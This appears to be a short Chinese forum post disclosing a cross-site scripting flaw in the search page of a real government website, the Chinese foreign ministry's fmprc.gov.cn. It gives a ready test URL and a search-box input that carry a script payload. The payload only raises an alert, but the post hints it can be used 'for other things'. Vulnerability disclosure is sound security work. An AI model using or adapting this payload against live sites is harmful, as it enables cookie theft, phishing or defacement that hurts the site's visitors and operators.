中华人民共和国外交部网站 http://www.fmprc.gov.cn
这个XSS漏洞不难利用,问题在 search.jsp 文件过滤不严格,且没有过滤post提交的数据,我们看看攻击的截图:
或者这个:
当然,用来做点别的也行……
测试链接:
http://www.fmprc.gov.cn/wjb/search.jsp?searchword=<script>alert('youxia')</script>
或在:
http://www.fmprc.gov.cn/wjb/search.jsp
搜索框中输入:
<script>alert('youxia')</script>